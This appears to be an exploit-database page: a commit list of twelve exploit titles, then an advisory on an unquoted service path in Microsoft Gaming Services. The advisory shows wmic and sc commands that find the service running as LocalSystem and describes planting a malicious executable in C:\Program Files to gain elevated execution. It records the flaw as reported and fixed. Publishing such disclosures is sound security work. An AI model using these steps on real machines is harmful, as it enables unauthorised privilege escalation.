8691f166f7
12 changes to exploits/shellcodes HMA VPN 5.3 - Unquoted Service Path Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) Cab Management System 1.0 - 'id' SQLi (Authenticated) Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated) Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated) Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection Thinfinity VirtualUI 2.5.26.2 - Information Disclosure WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated) FileCloud 21.2 - Cross-Site Request Forgery (CSRF) Dbltek GoIP - Local File Inclusion
71 lines
No EOL
2.1 KiB
Text
71 lines
No EOL
2.1 KiB
Text
# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
|
|
# Discovery by: Johto Robbie
|
|
# Discovery Date: May 12, 2021
|
|
# Tested Version: 2.52.13001.0
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on OS: Windows 10 x64 Home
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
Go to Start and type cmd. Enter the following command and press Enter:
|
|
|
|
C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |
|
|
findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """
|
|
|
|
Gaming Services
|
|
GamingServices C:\Program
|
|
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
|
|
|
|
|
|
|
|
Auto
|
|
|
|
Gaming Services
|
|
GamingServicesNet C:\Program
|
|
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
|
|
|
|
|
|
|
|
Auto
|
|
|
|
C:\Users\Bang's>sc qc "GamingServices"
|
|
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: GamingServices
|
|
|
|
TYPE : 210 WIN32_PACKAGED_PROCESS
|
|
|
|
START_TYPE : 2 AUTO_START
|
|
|
|
ERROR_CONTROL : 0 IGNORE
|
|
|
|
BINARY_PATH_NAME : C:\Program
|
|
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe
|
|
|
|
LOAD_ORDER_GROUP :
|
|
|
|
TAG : 0
|
|
|
|
DISPLAY_NAME : Gaming Services
|
|
|
|
DEPENDENCIES : staterepository
|
|
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
This application have no quote . And it contained in C:\Program Files. Put
|
|
mot malicious aplication with name "progarm.exe"
|
|
|
|
Stop & Start: GamingServices. "progarm.exe" will be execute
|
|
|
|
#Exploit:
|
|
|
|
An unquoted service path in
|
|
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to
|
|
privilege escalation during the installation process that is performed when
|
|
an executable file is registered. This could further lead to complete
|
|
compromise of confidentiality, Integrity and Availability.
|
|
|
|
#Timeline
|
|
May 12, 2021 - Reported to Microsoft
|
|
Feb 11, 2022 - Confirmed vulnerability has been fixed |